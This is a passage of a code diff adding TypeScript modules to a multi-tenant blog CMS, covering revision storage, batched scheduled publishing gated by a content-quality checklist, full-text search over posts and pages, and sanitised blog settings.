+    ORDER BY p.updated_at DESC
+    LIMIT ${pageSize} OFFSET ${offset}
+  `) as BlogPostAdminListRow[];
+
+  const countRows = (await tx`
+    SELECT count(*)::int AS count
+    FROM awcms_blog_posts p
+    WHERE p.tenant_id = ${tenantId} AND p.deleted_at IS NULL
+      AND (${status}::text IS NULL OR p.status = ${status})
+      AND (${search}::text IS NULL OR p.title ILIKE '%' || ${search} || '%')
+      AND (
+        ${termId}::uuid IS NULL
+        OR EXISTS (
+          SELECT 1 FROM awcms_blog_post_terms pt
+          WHERE pt.tenant_id = p.tenant_id AND pt.post_id = p.id AND pt.term_id = ${termId}
+        )
+      )
+  `) as { count: number }[];
+
+  return {
+    items: rows.map((row) => ({
+      ...toBlogPostSummary(row),
+      authorTenantUserId: row.author_tenant_user_id
+    })),
+    total: countRows[0]?.count ?? 0,
+    page,
+    pageSize
+  };
+}
+
+/**
+ * Hard delete. `awcms_blog_post_terms` rows for this post are deleted
+ * first — they are pure join metadata with no independent meaning once the
+ * post is gone, unlike `awcms_blog_revisions` (no FK to the post,
+ * intentionally left as historical record, same reasoning audit events keep
+ * referencing purged resources by id). Caller must have already verified
+ * `canPurgePost` (archived or soft-deleted) before calling this.
+ */
+export async function purgeBlogPost(
+  tx: Bun.SQL,
+  tenantId: string,
+  id: string
+): Promise<boolean> {
+  await tx`
+    DELETE FROM awcms_blog_post_terms
+    WHERE tenant_id = ${tenantId} AND post_id = ${id}
+  `;
+
+  const rows = await tx`
+    DELETE FROM awcms_blog_posts
+    WHERE tenant_id = ${tenantId} AND id = ${id}
+    RETURNING id
+  `;
+
+  return rows.length > 0;
+}

--- a/src/modules/blog-content/application/blog-revision-directory.ts
+++ b/src/modules/blog-content/application/blog-revision-directory.ts
@@ -1,0 +1,198 @@
+import { log } from "../../../lib/logging/logger";
+
+/**
+ * Read/write query module for `awcms_blog_revisions` (Issue #541).
+ * Append-only: `createBlogRevision` only ever `INSERT`s, there is no
+ * update/delete function in this file — matches the module README's
+ * "restore revisi" note (§Skema data, point 5) and the same convention
+ * `awcms_workflow_decisions`/`awcms_audit_events` already use.
+ */
+export type RevisionResourceType = "post" | "page";
+
+export type BlogRevisionSnapshot = {
+  title: string;
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  excerpt: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+  status: string;
+};
+
+export type BlogRevisionSummary = {
+  id: string;
+  tenantId: string;
+  resourceType: RevisionResourceType;
+  resourceId: string;
+  revisionNumber: number;
+  title: string;
+  status: string;
+  changeNote: string | null;
+  createdByTenantUserId: string;
+  createdAt: Date;
+};
+
+type BlogRevisionSummaryRow = {
+  id: string;
+  tenant_id: string;
+  resource_type: RevisionResourceType;
+  resource_id: string;
+  revision_number: number;
+  title: string;
+  status: string;
+  change_note: string | null;
+  created_by_tenant_user_id: string;
+  created_at: Date;
+};
+
+function toSummary(row: BlogRevisionSummaryRow): BlogRevisionSummary {
+  return {
+    id: row.id,
+    tenantId: row.tenant_id,
+    resourceType: row.resource_type,
+    resourceId: row.resource_id,
+    revisionNumber: row.revision_number,
+    title: row.title,
+    status: row.status,
+    changeNote: row.change_note,
+    createdByTenantUserId: row.created_by_tenant_user_id,
+    createdAt: row.created_at
+  };
+}
+
+export type BlogRevisionDetail = BlogRevisionSummary & {
+  contentJson: Record<string, unknown>;
+  contentText: string;
+  excerpt: string | null;
+  seoTitle: string | null;
+  metaDescription: string | null;
+  canonicalUrl: string | null;
+};
+
+type BlogRevisionDetailRow = BlogRevisionSummaryRow & {
+  content_json: Record<string, unknown>;
+  content_text: string;
+  excerpt: string | null;
+  seo_title: string | null;
+  meta_description: string | null;
+  canonical_url: string | null;
+};
+
+function toDetail(row: BlogRevisionDetailRow): BlogRevisionDetail {
+  return {
+    ...toSummary(row),
+    contentJson: row.content_json,
+    contentText: row.content_text,
+    excerpt: row.excerpt,
+    seoTitle: row.seo_title,
+    metaDescription: row.meta_description,
+    canonicalUrl: row.canonical_url
+  };
+}
+
+/**
+ * Inserts the next revision for a resource — `revision_number` is
+ * `MAX(revision_number) + 1` scoped to `(tenant_id, resource_type,
+ * resource_id)`, computed in the same statement so two concurrent writers
+ * can't compute the same number (the table's unique constraint on that
+ * triple is the actual guarantee; this subquery just avoids relying on a
+ * retry loop for the common case).
+ */
+export async function createBlogRevision(
+  tx: Bun.SQL,
+  tenantId: string,
+  resourceType: RevisionResourceType,
+  resourceId: string,
+  createdByTenantUserId: string,
+  snapshot: BlogRevisionSnapshot,
+  changeNote: string | null = null,
+  correlationId?: string
+): Promise<BlogRevisionDetail> {
+  const rows = (await tx`
+    INSERT INTO awcms_blog_revisions
+      (tenant_id, resource_type, resource_id, revision_number, title,
+       content_json, content_text, excerpt, seo_title, meta_description,
+       canonical_url, status, change_note, created_by_tenant_user_id)
+    VALUES (
+      ${tenantId}, ${resourceType}, ${resourceId},
+      COALESCE(
+        (SELECT MAX(revision_number) FROM awcms_blog_revisions
+          WHERE tenant_id = ${tenantId} AND resource_type = ${resourceType}
+            AND resource_id = ${resourceId}),
+        0
+      ) + 1,
+      ${snapshot.title}, ${snapshot.contentJson}, ${snapshot.contentText},
+      ${snapshot.excerpt}, ${snapshot.seoTitle}, ${snapshot.metaDescription},
+      ${snapshot.canonicalUrl}, ${snapshot.status}, ${changeNote},
+      ${createdByTenantUserId}
+    )
+    RETURNING id, tenant_id, resource_type, resource_id, revision_number, title,
+      content_json, content_text, excerpt, seo_title, meta_description,
+      canonical_url, status, change_note, created_by_tenant_user_id, created_at
+  `) as BlogRevisionDetailRow[];
+
+  const revision = toDetail(rows[0]!);
+
+  log("info", "blog-content.revision.created", {
+    correlationId,
+    tenantId,
+    moduleKey: "blog_content",
+    resourceType,
+    resourceId,
+    revisionId: revision.id,
+    revisionNumber: revision.revisionNumber
+  });
+
+  return revision;
+}
+
+const DEFAULT_LIST_LIMIT = 20;
+const MAX_LIST_LIMIT = 100;
+
+/** Newest revision first — same bounded-list convention as `listBlogPosts` (no cursor pagination yet). */
+export async function listBlogRevisions(
+  tx: Bun.SQL,
+  tenantId: string,
+  resourceType: RevisionResourceType,
+  resourceId: string,
+  options: { limit?: number } = {}
+): Promise<BlogRevisionSummary[]> {
+  const limit = Math.min(
+    Math.max(options.limit ?? DEFAULT_LIST_LIMIT, 1),
+    MAX_LIST_LIMIT
+  );
+
+  const rows = (await tx`
+    SELECT id, tenant_id, resource_type, resource_id, revision_number, title,
+      status, change_note, created_by_tenant_user_id, created_at
+    FROM awcms_blog_revisions
+    WHERE tenant_id = ${tenantId} AND resource_type = ${resourceType}
+      AND resource_id = ${resourceId}
+    ORDER BY revision_number DESC
+    LIMIT ${limit}
+  `) as BlogRevisionSummaryRow[];
+
+  return rows.map(toSummary);
+}
+
+/** Scoped to `resourceId` as well as `id` — a revision id from a different post/page must not be readable via this resource's URL. */
+export async function fetchBlogRevisionById(
+  tx: Bun.SQL,
+  tenantId: string,
+  resourceType: RevisionResourceType,
+  resourceId: string,
+  revisionId: string
+): Promise<BlogRevisionDetail | null> {
+  const rows = (await tx`
+    SELECT id, tenant_id, resource_type, resource_id, revision_number, title,
+      content_json, content_text, excerpt, seo_title, meta_description,
+      canonical_url, status, change_note, created_by_tenant_user_id, created_at
+    FROM awcms_blog_revisions
+    WHERE tenant_id = ${tenantId} AND resource_type = ${resourceType}
+      AND resource_id = ${resourceId} AND id = ${revisionId}
+  `) as BlogRevisionDetailRow[];
+
+  const row = rows[0];
+  return row ? toDetail(row) : null;
+}

--- a/src/modules/blog-content/application/blog-scheduled-publish.ts
+++ b/src/modules/blog-content/application/blog-scheduled-publish.ts
@@ -1,0 +1,300 @@
+import { withTenant } from "../../../lib/database/tenant-context";
+import { log } from "../../../lib/logging/logger";
+import { recordAuditEvent } from "../../logging/application/audit-log";
+import { fetchPostTermIds } from "./blog-taxonomy-directory";
+import { fetchBlogSettings } from "./blog-settings-directory";
+import { evaluateContentQualityChecklistForContent } from "./content-quality-checklist-gate";
+import type { NewsMediaPort } from "../../_shared/ports/news-media-port";
+import type { SocialPublishingPort } from "../../_shared/ports/social-publishing-port";
+
+/**
+ * Scheduled publishing (Issue #541, doc issue #541 §Scheduled Publishing
+ * Rules). A post becomes due when `status = 'scheduled' AND scheduled_at <=
+ * now()` — the same `awcms_blog_posts` predicate every other lifecycle
+ * transition in this module already checks (`isValidStatusTransition`
+ * governs the *legality* of scheduled -> published; this job is the thing
+ * that actually performs it once due, since there is no external
+ * cron/provider integration in scope for #541).
+ *
+ * Issue #640 restructured this from a single set-based `UPDATE` into a
+ * per-post loop: the content quality checklist must gate this transition
+ * too, not just the interactive `POST .../publish`/`.../schedule` endpoints
+ * — otherwise a tenant could bypass the checklist entirely by scheduling a
+ * post BEFORE the tenant applied full-online R2-only mode (or before an
+ * editor fixed a since-flagged problem) and simply waiting for it to become
+ * due, the exact class of gap Issue #636's "restore revision" bypass
+ * already taught this epic to close for every new write/transition path.
+ * A post whose checklist fails at due-time is left `scheduled` (not
+ * silently published, not silently un-scheduled) and reported via a
+ * dedicated audit event — an operator/editor can inspect and fix it, then
+ * either re-schedule or publish manually once ready. Still idempotent: a
+ * post already `published`, still in the future, or left `scheduled` due to
+ * a prior blocked attempt simply doesn't match the `WHERE`/isn't re-blocked
+ * twice in a way that changes anything on a re-run. `mediaPort` is supplied
+ * by the caller (`scripts/blog-scheduled-publish.ts`, the composition root,
+ * per ADR-0011) — this file itself never imports `news_portal`.
+ *
+ * Issue #643 (epic `social_publishing`): `socialPublishingPort`, when
+ * supplied by the caller, is invoked right after each individual post
+ * publish succeeds — `SocialPublishingPort.onArticlePublished(...)` with
+ * `trigger: "scheduled_published"`. Plain DB outbox-row writes inside the
+ * SAME transaction as the publish `UPDATE` above (ADR-0006 compliant — no
+ * external provider call happens here); optional and defaults to a no-op
+ * so a deployment that never wires a social-publishing port (the default;
+ * see `social-publishing/domain/social-publishing-config.ts`) behaves
+ * exactly as before this issue.
+ */
+/**
+ * Per-run safety bound for the due-post selection (Issue #835 §6). The
+ * previous query took `FOR UPDATE` on EVERY matching row with no `LIMIT`,
+ * so a large backlog (job paused, a bulk campaign) locked and loaded the
+ * whole set into one transaction and, worse, made a second concurrent runner
+ * BLOCK on those locks. This bound + `FOR UPDATE SKIP LOCKED` (below) caps
+ * the work/locks per run and lets a concurrent runner pick up a disjoint
+ * batch instead of waiting. A backlog larger than this is finished on
+ * subsequent scheduled runs (the job is periodic and idempotent) — reported
+ * via `result.partial`, the same "partial this run, remainder next run"
+ * convention `audit-log-purge.ts`/news-media reconciliation already use.
+ * Ordered `scheduled_at ASC` so the longest-overdue posts publish first.
+ */
+export const SCHEDULED_PUBLISH_BATCH_LIMIT = 200;
+
+export type PublishDueScheduledPostsOptions = {
+  now?: Date;
+  correlationId?: string;
+};
+
+export type PublishDueScheduledPostsResult = {
+  publishedCount: number;
+  publishedPostIds: string[];
+  blockedCount: number;
+  blockedPostIds: string[];
+  /**
+   * `true` when this run selected a full `SCHEDULED_PUBLISH_BATCH_LIMIT`
+   * batch, i.e. there may be more due posts a later run will pick up. Callers
+   * that must drain the whole backlog immediately can loop until this is
+   * `false`; the periodic worker (`scripts/blog-scheduled-publish.ts`) does
+   * not need to, since it runs again on a schedule.
+   */
+  partial: boolean;
+};
+
+type DuePostRow = {
+  id: string;
+  slug: string;
+  title: string;
+  excerpt: string | null;
+  content_json: Record<string, unknown>;
+  content_text: string;
+  featured_media_id: string | null;
+  seo_image_media_id: string | null;
+  meta_description: string | null;
+};
+
+export async function publishDueScheduledPosts(
+  sql: Bun.SQL,
+  tenantId: string,
+  mediaPort: NewsMediaPort,
+  options: PublishDueScheduledPostsOptions = {},
+  socialPublishingPort?: SocialPublishingPort
+): Promise<PublishDueScheduledPostsResult> {
+  const now = options.now ?? new Date();
+  const correlationId = options.correlationId;
+
+  return withTenant(
+    sql,
+    tenantId,
+    async (tx) => {
+      const due = (await tx`
+        SELECT id, slug, title, excerpt, content_json, content_text,
+               featured_media_id, seo_image_media_id, meta_description
+        FROM awcms_blog_posts
+        WHERE tenant_id = ${tenantId} AND status = 'scheduled'
+          AND scheduled_at IS NOT NULL AND scheduled_at <= ${now}
+          AND deleted_at IS NULL
+        ORDER BY scheduled_at ASC
+        LIMIT ${SCHEDULED_PUBLISH_BATCH_LIMIT}
+        FOR UPDATE SKIP LOCKED
+      `) as DuePostRow[];
+
+      const partial = due.length === SCHEDULED_PUBLISH_BATCH_LIMIT;
+
+      if (due.length === 0) {
+        await recordAuditEvent(tx, {
+          tenantId,
+          moduleKey: "blog_content",
+          action: "blog.post.scheduled_publish_skipped",
+          resourceType: "blog_post",
+          severity: "info",
+          message: "Scheduled publish ran: no due posts.",
+          correlationId
+        });
+
+        return {
+          publishedCount: 0,
+          publishedPostIds: [],
+          blockedCount: 0,
+          blockedPostIds: [],
+          partial: false
+        };
+      }
+
+      const blogSettings = await fetchBlogSettings(tx, tenantId);
+      const publishedPostIds: string[] = [];
+      const blockedPostIds: string[] = [];
+
+      for (const post of due) {
+        const termIds = await fetchPostTermIds(tx, tenantId, post.id);
+        const evaluateChecklist = () =>
+          evaluateContentQualityChecklistForContent(
+            tx,
+            tenantId,
+            "post",
+            {
+              title: post.title,
+              slug: post.slug,
+              excerpt: post.excerpt,
+              metaDescription: post.meta_description,
+              contentText: post.content_text,
+              contentJson: post.content_json,
+              featuredMediaId: post.featured_media_id,
+              seoImageMediaId: post.seo_image_media_id
+            },
+            termIds.length,
+            mediaPort,
+            blogSettings.contentQualityChecklistPolicy,
+            {
+              socialPreviewFallback: {
+                tenantFallbackImageMediaId:
+                  blogSettings.socialPreviewFallbackImageMediaId,
+                contentImageFallbackEnabled:
+                  blogSettings.socialPreviewContentImageFallbackEnabled
+              }
+            }
+          );
+
+        let checklist = await evaluateChecklist();
+
+        /**
+         * TOCTOU mitigation (security-auditor Medium finding, PR #725): the
+         * post row itself is protected by the batch's own `FOR UPDATE` lock
+         * (above), but the R2 media objects it references are NOT locked —
+         * an editor could detach/invalidate the featured/gallery media
+         * between this first evaluation and the `UPDATE` below, especially
+         * for a large due-batch where earlier posts' evaluations/updates
+         * push that gap out further. Re-running the evaluation immediately
+         * before the `UPDATE` shrinks that window from "the rest of this
+         * tenant's whole batch" down to one query round-trip — it doesn't
+         * eliminate the race outright (that would need locking the
+         * referenced media rows too, a bigger change touching the shared
+         * `NewsMediaPort` every read-only preview endpoint also uses), but
+         * closes the realistic exposure at negligible cost.
+         */
+        if (checklist.passed) {
+          checklist = await evaluateChecklist();
+        }
+
+        if (!checklist.passed) {
+          blockedPostIds.push(post.id);
+
+          await recordAuditEvent(tx, {
+            tenantId,
+            moduleKey: "blog_content",
+            action: "blog.post.scheduled_publish_blocked",
+            resourceType: "blog_post",
+            resourceId: post.id,
+            severity: "warning",
+            message: `Scheduled publish blocked by content quality checklist: ${post.slug}.`,
+            attributes: {
+              blockedRuleIds: checklist.blockers.map(
+                (blocker) => blocker.ruleId
+              )
+            },
+            correlationId
+          });
+
+          log("warning", "blog-content.post.scheduled_publish_blocked", {
+            correlationId,
+            tenantId,
+            moduleKey: "blog_content",
+            postId: post.id,
+            slug: post.slug
+          });
+
+          continue;
+        }
+
+        await tx`
+          UPDATE awcms_blog_posts
+          SET status = 'published',
+              published_at = COALESCE(published_at, ${now}),
+              scheduled_at = NULL,
+              version = version + 1,
+              updated_at = ${now}
+          WHERE tenant_id = ${tenantId} AND id = ${post.id}
+        `;
+
+        publishedPostIds.push(post.id);
+
+        await recordAuditEvent(tx, {
+          tenantId,
+          moduleKey: "blog_content",
+          action: "blog.post.published",
+          resourceType: "blog_post",
+          resourceId: post.id,
+          severity: "info",
+          message: `Blog post published by scheduled publish: ${post.slug}.`,
+          correlationId
+        });
+
+        log("info", "blog-content.post.published", {
+          correlationId,
+          tenantId,
+          moduleKey: "blog_content",
+          postId: post.id,
+          slug: post.slug,
+          trigger: "scheduled_publish"
+        });
+
+        if (socialPublishingPort) {
+          await socialPublishingPort.onArticlePublished(
+            tx,
+            tenantId,
+            {
+              articleId: post.id,
+              title: post.title,
+              slug: post.slug,
+              excerpt: post.excerpt,
+              featuredMediaId: post.featured_media_id,
+              trigger: "scheduled_published"
+            },
+            correlationId
+          );
+        }
+      }
+
+      await recordAuditEvent(tx, {
+        tenantId,
+        moduleKey: "blog_content",
+        action: "blog.post.scheduled_publish_executed",
+        resourceType: "blog_post",
+        severity: "info",
+        message: `Scheduled publish ran: ${publishedPostIds.length} post(s) published, ${blockedPostIds.length} blocked.`,
+        attributes: {
+          publishedCount: publishedPostIds.length,
+          blockedCount: blockedPostIds.length
+        },
+        correlationId
+      });
+
+      return {
+        publishedCount: publishedPostIds.length,
+        publishedPostIds,
+        blockedCount: blockedPostIds.length,
+        blockedPostIds,
+        partial
+      };
+    },
+    { workClass: "maintenance" }
+  );
+}

--- a/src/modules/blog-content/application/blog-search.ts
+++ b/src/modules/blog-content/application/blog-search.ts
@@ -1,0 +1,215 @@
+import {
+  encodeKeysetCursor,
+  type KeysetCursor
+} from "../../_shared/keyset-pagination";
+import type { BlogContentStatus } from "../domain/post-status";
+
+/**
+ * PostgreSQL full-text search across `awcms_blog_posts` and
+ * `awcms_blog_pages` (doc issue #539 §Scope: "PostgreSQL full-text
+ * search for posts and pages"). Both tables' `search_vector` is a
+ * `GENERATED ALWAYS ... STORED` column (migration 028) — no trigger or
+ * application code populates it, so this file only ever *reads*
+ * `search_vector`, never writes it.
+ *
+ * Two entry points, matching the issue's split: `searchBlogContentAdmin`
+ * (tenant-scoped, all statuses, gated by `blog_content.search.read`) and
+ * `searchPublicBlogContent` (the "public-safe search helper" — doc issue
+ * #539 explicitly calls this a *helper*, not a route: no
+ * `GET /api/v1/blog/search`-equivalent public endpoint exists yet, public
+ * route rendering is Issue #540's scope). Both share the same query shape
+ * and keyset-cursor pagination (`_shared/keyset-pagination.ts`, same
+ * `(created_at, id)` convention `GET /api/v1/logs/audit` established) —
+ * only the WHERE predicate differs.
+ */
+export type BlogSearchResourceType = "post" | "page";
+
+export type BlogSearchResultItem = {
+  resourceType: BlogSearchResourceType;
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  status: string;
+  visibility: string;
+  locale: string;
+  publishedAt: Date | null;
+  createdAt: Date;
+  updatedAt: Date;
+};
+
+type BlogSearchRow = {
+  resource_type: BlogSearchResourceType;
+  id: string;
+  title: string;
+  slug: string;
+  excerpt: string | null;
+  status: string;
+  visibility: string;
+  locale: string;
+  published_at: Date | null;
+  created_at: Date;
+  updated_at: Date;
+  /**
+   * Full-precision (microsecond) UTC text form of `created_at`, for the
+   * keyset cursor ONLY — never the display value (Issue #158; see
+   * `_shared/keyset-pagination.ts`'s module doc comment for why a JS `Date`
+   * would silently skip rows sharing a millisecond).
+   */
+  created_at_cursor: string;
+};
+
+function toResultItem(row: BlogSearchRow): BlogSearchResultItem {
+  return {
+    resourceType: row.resource_type,
+    id: row.id,
+    title: row.title,
+    slug: row.slug,
+    excerpt: row.excerpt,
+    status: row.status,
+    visibility: row.visibility,
+    locale: row.locale,
+    publishedAt: row.published_at,
+    createdAt: row.created_at,
+    updatedAt: row.updated_at
+  };
+}
+
+export type BlogSearchResult = {
+  items: BlogSearchResultItem[];
+  nextCursor: string | null;
+};
+
+const DEFAULT_SEARCH_LIMIT = 20;
+const MAX_SEARCH_LIMIT = 100;
+
+export type SearchBlogContentAdminFilter = {
+  query: string;
+  resourceType?: BlogSearchResourceType;
+  status?: BlogContentStatus;
+  cursor?: KeysetCursor;
+  limit?: number;
+};
+
+/** `GET /api/v1/blog/search` (Issue #539) — gated by `blog_content.search.read`, may return content of any status per doc issue #539: "Admin search may include draft/review/scheduled/published/archived content according to permission." */
+export async function searchBlogContentAdmin(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: SearchBlogContentAdminFilter
+): Promise<BlogSearchResult> {
+  const limit = Math.min(
+    Math.max(filter.limit ?? DEFAULT_SEARCH_LIMIT, 1),
+    MAX_SEARCH_LIMIT
+  );
+  const cursorCreatedAt = filter.cursor?.createdAt ?? null;
+  const cursorId = filter.cursor?.id ?? null;
+  const resourceTypeFilter = filter.resourceType ?? null;
+  const statusFilter = filter.status ?? null;
+
+  const rows = (await tx`
+    SELECT * FROM (
+      SELECT 'post' AS resource_type, id, title, slug, excerpt, status, visibility,
+             locale, published_at, created_at, updated_at,
+             to_char(created_at AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"+00:00"') AS created_at_cursor
+      FROM awcms_blog_posts
+      WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+        AND search_vector @@ websearch_to_tsquery('simple', ${filter.query})
+        AND (${statusFilter}::text IS NULL OR status = ${statusFilter})
+      UNION ALL
+      SELECT 'page' AS resource_type, id, title, slug, excerpt, status, visibility,
+             locale, published_at, created_at, updated_at,
+             to_char(created_at AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"+00:00"') AS created_at_cursor
+      FROM awcms_blog_pages
+      WHERE tenant_id = ${tenantId} AND deleted_at IS NULL
+        AND search_vector @@ websearch_to_tsquery('simple', ${filter.query})
+        AND (${statusFilter}::text IS NULL OR status = ${statusFilter})
+    ) combined
+    WHERE (${resourceTypeFilter}::text IS NULL OR resource_type = ${resourceTypeFilter})
+      AND (
+        ${cursorCreatedAt}::timestamptz IS NULL
+        OR (created_at, id) < (${cursorCreatedAt}, ${cursorId})
+      )
+    ORDER BY created_at DESC, id DESC
+    LIMIT ${limit}
+  `) as BlogSearchRow[];
+
+  const items = rows.map(toResultItem);
+  const nextCursor =
+    rows.length === limit
+      ? encodeKeysetCursor(
+          rows[rows.length - 1]!.created_at_cursor,
+          rows[rows.length - 1]!.id
+        )
+      : null;
+
+  return { items, nextCursor };
+}
+
+export type SearchPublicBlogContentFilter = {
+  query: string;
+  resourceType?: BlogSearchResourceType;
+  cursor?: KeysetCursor;
+  limit?: number;
+};
+
+/**
+ * Public-safe search helper (doc issue #539 §Public Visibility Predicate)
+ * — `status = 'published' AND visibility = 'public' AND deleted_at IS NULL
+ * AND published_at IS NOT NULL AND published_at <= now()`, applied to both
+ * posts and pages. Not wired to any route in this issue (public route
+ * rendering is Issue #540's scope, out of scope here) — exported so #540
+ * calls this directly instead of re-deriving the predicate.
+ */
+export async function searchPublicBlogContent(
+  tx: Bun.SQL,
+  tenantId: string,
+  filter: SearchPublicBlogContentFilter
+): Promise<BlogSearchResult> {
+  const limit = Math.min(
+    Math.max(filter.limit ?? DEFAULT_SEARCH_LIMIT, 1),
+    MAX_SEARCH_LIMIT
+  );
+  const cursorCreatedAt = filter.cursor?.createdAt ?? null;
+  const cursorId = filter.cursor?.id ?? null;
+  const resourceTypeFilter = filter.resourceType ?? null;
+
+  const rows = (await tx`
+    SELECT * FROM (
+      SELECT 'post' AS resource_type, id, title, slug, excerpt, status, visibility,
+             locale, published_at, created_at, updated_at,
+             to_char(created_at AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"+00:00"') AS created_at_cursor
+      FROM awcms_blog_posts
+      WHERE tenant_id = ${tenantId}
+        AND status = 'published' AND visibility = 'public'
+        AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()
+        AND search_vector @@ websearch_to_tsquery('simple', ${filter.query})
+      UNION ALL
+      SELECT 'page' AS resource_type, id, title, slug, excerpt, status, visibility,
+             locale, published_at, created_at, updated_at,
+             to_char(created_at AT TIME ZONE 'UTC', 'YYYY-MM-DD"T"HH24:MI:SS.US"+00:00"') AS created_at_cursor
+      FROM awcms_blog_pages
+      WHERE tenant_id = ${tenantId}
+        AND status = 'published' AND visibility = 'public'
+        AND deleted_at IS NULL AND published_at IS NOT NULL AND published_at <= now()
+        AND search_vector @@ websearch_to_tsquery('simple', ${filter.query})
+    ) combined
+    WHERE (${resourceTypeFilter}::text IS NULL OR resource_type = ${resourceTypeFilter})
+      AND (
+        ${cursorCreatedAt}::timestamptz IS NULL
+        OR (created_at, id) < (${cursorCreatedAt}, ${cursorId})
+      )
+    ORDER BY created_at DESC, id DESC
+    LIMIT ${limit}
+  `) as BlogSearchRow[];
+
+  const items = rows.map(toResultItem);
+  const nextCursor =
+    rows.length === limit
+      ? encodeKeysetCursor(
+          rows[rows.length - 1]!.created_at_cursor,
+          rows[rows.length - 1]!.id
+        )
+      : null;
+
+  return { items, nextCursor };
+}

--- a/src/modules/blog-content/application/blog-settings-directory.ts
+++ b/src/modules/blog-content/application/blog-settings-directory.ts
@@ -1,0 +1,225 @@
+/**
+ * `awcms_blog_settings` read/write (Issue #543 §Settings Page) — one
+ * row per tenant, same upsert convention `theme-settings-directory.ts`
+ * (Issue #542) uses for `awcms_blog_theme_settings`. `blogTitle`,
+ * `blogDescription`, `rssEnabled`, `sitemapEnabled` are stored in the
+ * table's catch-all `settings jsonb` column (see `blog-settings-policy.ts`
+ * header comment for why); everything else has its own typed column
+ * already seeded by migration 026.
+ */
+import type { UpdateBlogSettingsInput } from "../domain/blog-settings-policy";
+import type { BlogContentVisibility } from "../domain/post-status";
+import {
+  isOverridableChecklistRuleId,
+  isValidChecklistSeverity,
+  type ChecklistPolicyOverrides
+} from "../domain/content-quality-checklist";
+
+export type BlogSettingsView = {
+  tenantId: string;
+  blogTitle: string;
+  blogDescription: string | null;
+  postsPerPage: number;
+  rssEnabled: boolean;
+  sitemapEnabled: boolean;
+  defaultLocale: string;
+  defaultVisibility: BlogContentVisibility;
+  seoDefaultTitle: string | null;
+  seoDefaultDescription: string | null;
+  /** Issue #640 — tenant override of the content quality checklist's non-security rule severities; `{}` when the tenant never configured one (checklist falls back to its own defaults). */
+  contentQualityChecklistPolicy: ChecklistPolicyOverrides;
+  /** Issue #649 — tenant-level R2 fallback social preview image id (source priority #4); `null` when never configured. Re-verified at render time, never trusted from this stored value alone (see `blog-settings-policy.ts`'s field comment). */
+  socialPreviewFallbackImageMediaId: string | null;
+  /** Issue #649 — whether the "first verified R2 image in content" fallback (source priority #3) is allowed; default `true`. */
+  socialPreviewContentImageFallbackEnabled: boolean;
+  updatedAt: string | null;
+};
+
+const DEFAULT_BLOG_TITLE = "Blog";
+const DEFAULT_POSTS_PER_PAGE = 10;
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+type BlogSettingsRow = {
+  tenant_id: string;
+  default_locale: string;
+  default_visibility: BlogContentVisibility;
+  posts_per_page: number;
+  seo_default_title: string | null;
+  seo_default_description: string | null;
+  settings: Record<string, unknown>;
+  updated_at: Date;
+};
+
+/**
+ * Filters a raw stored `contentQualityChecklistPolicy` blob down to only
+ * entries that are BOTH a genuinely overridable (non-security) rule id and
+ * a real `ChecklistSeverity` value — reviewer/security-auditor finding on
+ * PR #725: the write side (`blog-settings-policy.ts`) already rejects an
+ * invalid entry with a 400, but the read side previously only checked
+ * "is this an object," trusting its shape and contents unconditionally.
+ * Since the only path that can ever WRITE this column already validates,
+ * this is defense-in-depth against a future direct DB write/migration/
+ * refactor bypassing that single write-time gate — same "don't trust a
+ * single enforcement point" lesson as Issue #636's revision-restore fix.
+ */
+function sanitizeChecklistPolicyOverrides(
+  raw: unknown
+): ChecklistPolicyOverrides {
+  if (typeof raw !== "object" || raw === null || Array.isArray(raw)) {
+    return {};
+  }
+
+  const sanitized: ChecklistPolicyOverrides = {};
+
+  for (const [ruleId, severity] of Object.entries(
+    raw as Record<string, unknown>
+  )) {
+    if (
+      isOverridableChecklistRuleId(ruleId) &&
+      isValidChecklistSeverity(severity)
+    ) {
+      sanitized[ruleId] = severity;
+    }
+  }
+
+  return sanitized;
+}
+
+/**
+ * Defense-in-depth re-check for `socialPreviewFallbackImageMediaId` — same
+ * "don't trust a single enforcement point" reasoning as
+ * `sanitizeChecklistPolicyOverrides` above. Even if a malformed value ever
+ * reached this jsonb column (bypassing `blog-settings-policy.ts`'s
+ * write-time UUID check), it is never actually TRUSTED as a media reference
+ * anyway — the render route always re-resolves it through
+ * `NewsMediaPort.resolveMediaReferences`, which fails closed on anything
+ * that isn't a real, verified, same-tenant object id. This function only
+ * prevents an obviously-invalid string from being handed to that resolver
+ * at all.
+ */
+function sanitizeSocialPreviewFallbackImageMediaId(
+  raw: unknown
+): string | null {
+  return typeof raw === "string" && UUID_PATTERN.test(raw) ? raw : null;
+}
+
+function toView(
+  tenantId: string,
+  row: BlogSettingsRow | null
+): BlogSettingsView {
+  const extras = row?.settings ?? {};
+
+  return {
+    tenantId,
+    blogTitle:
+      typeof extras.blogTitle === "string"
+        ? extras.blogTitle
+        : DEFAULT_BLOG_TITLE,
+    blogDescription:
+      typeof extras.blogDescription === "string"
+        ? extras.blogDescription
+        : null,
+    postsPerPage: row?.posts_per_page ?? DEFAULT_POSTS_PER_PAGE,
+    rssEnabled: extras.rssEnabled !== false,
+    sitemapEnabled: extras.sitemapEnabled !== false,
+    defaultLocale: row?.default_locale ?? "id",
+    defaultVisibility: row?.default_visibility ?? "public",
+    seoDefaultTitle: row?.seo_default_title ?? null,
+    seoDefaultDescription: row?.seo_default_description ?? null,
+    contentQualityChecklistPolicy: sanitizeChecklistPolicyOverrides(
+      extras.contentQualityChecklistPolicy
+    ),
+    socialPreviewFallbackImageMediaId:
+      sanitizeSocialPreviewFallbackImageMediaId(
+        extras.socialPreviewFallbackImageMediaId
+      ),
+    socialPreviewContentImageFallbackEnabled:
+      extras.socialPreviewContentImageFallbackEnabled !== false,
+    updatedAt: row?.updated_at.toISOString() ?? null
+  };
+}
+
+/** `null` row (tenant never configured settings) still returns a full view built from defaults — same "missing row = default" convention `fetchPublicBlogSettings` already uses. */
